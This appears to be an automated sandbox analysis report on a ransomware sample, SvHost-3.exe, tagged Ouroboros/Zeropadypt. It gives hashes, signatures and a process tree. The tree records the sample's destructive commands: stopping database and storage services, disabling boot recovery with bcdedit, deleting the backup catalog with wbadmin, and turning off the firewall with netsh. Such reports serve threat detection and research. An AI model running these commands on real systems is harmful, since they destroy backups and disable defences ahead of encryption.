Overview

overview

10

Static

static

8

SvHost-3.exe

windows7_x64

10

SvHost-3.exe

windows10_x64

10

Resubmissions

25-06-2021 19:07

210625-wj3es9fxde 10

24-06-2021 06:02

210624-78vvv4fkks 10

Analysis

  • max time kernel
    36s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-06-2021 19:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SvHost-3.exe

  • Size

    1.3MB

  • MD5

    6d0cefa5b7f1744aa5dbc041c50b1709

  • SHA1

    023fe5cafe7f0b32bfaf1b3549785e4d36a13b63

  • SHA256

    c6da46d2abe90035674272a826d1203dde07338e27e3ebefc6335cbedb389019

  • SHA512

    fb3bef44b77d7d3b83c42f769236f2c7646f1642d07f3650199d6511a111b31cb917fdc9d776d0e4be5cffb374a162ce4cd09925463b94f9bf8be50501f66631

Score
10/10
ouroborosevasionransomware

Malware Config

Signatures

  • Ouroboros/Zeropadypt

    Ransomware family based on open-source CryptoWire.

    ransomwareouroboros
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Drops desktop.ini file(s) 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NTFS ADS 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SvHost-3.exe
    "C:\Users\Admin\AppData\Local\Temp\SvHost-3.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:996
    • C:\Users\Admin\AppData\Local\Temp\Windows Session Manager.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Session Manager.exe"
      2⤵
      • Executes dropped EXE
      • Drops desktop.ini file(s)
      • Drops file in Program Files directory
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:900
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c net stop MSDTC
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\SysWOW64\net.exe
          net stop MSDTC
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3156
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop MSDTC
            5⤵
              PID:412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
            PID:1196
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no
            3⤵
              PID:1648
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c wbadmin delete catalog -quiet
              3⤵
                PID:3912
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c net stop SQLSERVERAGENT
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2216
                • C:\Windows\SysWOW64\net.exe
                  net stop SQLSERVERAGENT
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4064
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop SQLSERVERAGENT
                    5⤵
                      PID:2888
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2920
                  • C:\Windows\SysWOW64\net.exe
                    net stop MSSQLSERVER
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1332
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MSSQLSERVER
                      5⤵
                        PID:2700
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c net stop vds
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3116
                    • C:\Windows\SysWOW64\net.exe
                      net stop vds
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2136
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop vds
                        5⤵
                          PID:3780
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3920
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh advfirewall set currentprofile state off
                        4⤵
                          PID:2396
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh firewall set opmode mode=disable
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3180
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          4⤵
                            PID:2648
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c net stop SQLWriter
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3520
                          • C:\Windows\SysWOW64\net.exe
                            net stop SQLWriter
                            4⤵
                              PID:3000
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop SQLWriter
                                5⤵
                                  PID:2128
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c net stop SQLBrowser
                              3⤵
                                PID:1008
                                • C:\Windows\SysWOW64\net.exe
                                  net stop SQLBrowser
                                  4⤵
                                    PID:3772
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop SQLBrowser
                                      5⤵
                                        PID:2508
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c net stop MSSQLSERVER
                                    3⤵
                                      PID:2544
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop MSSQLSERVER
                                        4⤵
                                          PID:1348
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop MSSQLSERVER
                                            5⤵
                                              PID:2252
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c net stop MSSQL$CONTOSO1
                                          3⤵
                                            PID:1620
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop MSSQL$CONTOSO1
                                              4⤵
                                                PID:496
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop MSSQL$CONTOSO1
                                                  5⤵
                                                    PID:1020

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads